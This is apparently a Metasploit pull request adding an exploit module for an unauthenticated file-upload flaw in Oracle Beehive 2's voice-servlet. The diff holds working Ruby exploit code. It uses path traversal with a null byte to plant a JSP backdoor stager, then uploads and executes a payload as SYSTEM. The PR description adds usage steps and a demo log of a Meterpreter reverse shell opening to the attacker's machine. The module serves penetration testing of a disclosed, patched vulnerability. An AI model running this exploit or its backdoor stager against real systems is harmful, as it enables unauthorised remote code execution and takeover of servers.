### PR TITLE
Add Oracle Beehive prepareAudioToPlay Exploit Module

### DIFF
--- a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb
+++ b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb
@@ -1,0 +1,149 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",
+      'Description'    => %q{
+        This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method
+        found in voice-servlet can be abused to write a malicious file onto the target machine, and
+        gain remote arbitrary code execution under the context of SYSTEM. Authentication is not
+        required to exploit this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'mr_me <steventhomasseeley[at]gmail.com>', # Source Incite. Vulnerability discovery, PoC
+          'sinn3r'                                  # MSF module
+        ],
+      'References'     =>
+        [
+          [ 'ZDI', '15-550']
+        ],
+      'DefaultOptions'  =>
+        {
+          'RPORT'    => 7777
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Oracle Beehive 2', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Nov 10 2015",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/'])
+      ], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa/'))
+
+    if res.nil?
+      vprint_error("Connection timed out.")
+      return Exploit::CheckCode::Unknown
+    elsif res && (res.code == 403 || res.code == 200)
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+
+  def exploit
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::NotVulnerable, 'Target does not have voice-servlet')
+    end
+
+    # Init some names
+    # We will upload to:
+    # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\prompt-qa\
+    exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe"
+    stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp"
+    print_status("Stager name is: #{stager_name}")
+    print_status("Executable name is: #{exe_name}")
+    register_files_for_cleanup("../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}")
+
+    # Ok fire!
+    print_status("Uploading stager...")
+    res = upload_stager(stager_name, exe_name)
+
+    # Hmm if we fail to upload the stager, no point to continue.
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out.')
+    end
+
+    print_status("Uploading payload...")
+    upload_payload(stager_name)
+  end
+
+  # Our stager is basically a backdoor that allows us to upload an executable with a POST request.
+  def get_jsp_stager(exe_name)
+    jsp = %Q|<%@ page import="java.io.*" %>
+<%
+  ByteArrayOutputStream buf = new ByteArrayOutputStream();
+  BufferedReader reader = request.getReader();
+  int tmp;
+  while ((tmp = reader.read()) != -1) { buf.write(tmp); }
+  FileOutputStream fostream = new FileOutputStream("#{exe_name}");
+  buf.writeTo(fostream);
+  fostream.close();
+  Runtime.getRuntime().exec("#{exe_name}");
+%>|
+
+    # Since we're sending it as a GET request, we want to keep it smaller so
+    # we gsub stuff we don't want.
+    jsp.gsub!("\n", '')
+    jsp.gsub!('  ', ' ')
+    Rex::Text.uri_encode(jsp)
+  end
+
+
+  def upload_stager(stager_name, exe_name)
+    # wavfile = Has to be longer than 4 bytes (otherwise you hit a java bug)
+
+    jsp_stager = get_jsp_stager(exe_name)
+    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'playAudioFile.jsp')
+    send_request_cgi({
+      'method'        => 'POST',
+      'uri'           => uri,
+      'encode_params' => false, # Don't encode %00 for us
+      'vars_post'    => {
+        'sess'       => "..\\#{stager_name}%00",
+        'recxml'     => jsp_stager,
+        'audiopath'  => Rex::Text.rand_text_alpha(1),
+        'wavfile'    => "#{Rex::Text.rand_text_alpha(5)}.wav",
+        'evaluation' => Rex::Text.rand_text_alpha(1)
+      }
+    })
+  end
+
+  def upload_payload(stager_name)
+    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'data'   => generate_payload_exe(code: payload.encoded)
+    })
+  end
+
+  def print_status(msg)
+    super("#{rhost}:#{rport} - #{msg}")
+  end
+
+end

--- a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb
+++ b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['Oracle Beehive 2', {}]
         ],
-      'Privileged'     => false,
+      'Privileged'     => true,
       'DisclosureDate' => "Nov 10 2015",
       'DefaultTarget'  => 0))
 

--- a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb
+++ b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb
@@ -29,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          [ 'ZDI', '15-550']
+          [ 'ZDI', '15-550'],
+          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html' ]
         ],
       'DefaultOptions'  =>
         {


### PR DESCRIPTION
## Description

Oracle Beehive suffers from a vulnerability that allows a remote attacker to upload a malicious file, and execute it under the context of SYSTEM. Authentication is not required to exploit this vulnerability.

The vulnerability is found in the prepareAudioToPlay() function of voice-servlet. This function is meant to be used to prepare for an wav file upload, such as creating the base path, a session file, etc. The session file creation can be abused via the playAudioFile.jsp page to upload anything we want without any security checks.
## Verification
- [ ] Set up a server-class Windows system. For example: Windows Server 2003.
- [ ] Install Oracle Database, such as [Oracle Database 11g](http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html).
- [ ] Install a vulnerable version of Oracle Beehive. For your reference, this exploit was written against Oracle Beehive 2.0.1.0.0. Note that Beehive is no longer available to download from Oracle, so either you already have it, or if you work with me, come find me.
- [ ] On the Windows test box, make sure port 7777 is listening. You can do this in the command prompt: `netstat -an | find "7777"`
- [ ] On the Windows test box, make sure it can ping the attacker's box. You can do this in the command prompt: `ping [attacker's IP]`
- [ ] Start msfconsole
- [ ] Do: `use exploit/windows/http/oracle_beehive_prepareaudiotoplay`
- [ ] Do: `set RHOST [target IP]`
- [ ] Do: `run` (it will automatically default to a windows/meterpreter/reverse_tcp payload)
- [ ] You should get a shell like the demo below.
## Demo

```
$ msfconsole
msf exploit(beehive) > check
[*] 192.168.1.109:7777 - The target service is running, but could not be validated.
msf exploit(beehive) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.109:7777 - Stager name is: mnTZr.jsp
[*] 192.168.1.109:7777 - Executable name is: LrWsO.exe
[*] 192.168.1.109:7777 - Uploading stager...
[*] 192.168.1.109:7777 - Uploading payload...
[*] Sending stage (885806 bytes) to 192.168.1.109
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.109:2652) at 2015-10-15 15:52:38 -0500
[+] Deleted ../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/mnTZr.jsp

meterpreter >
```
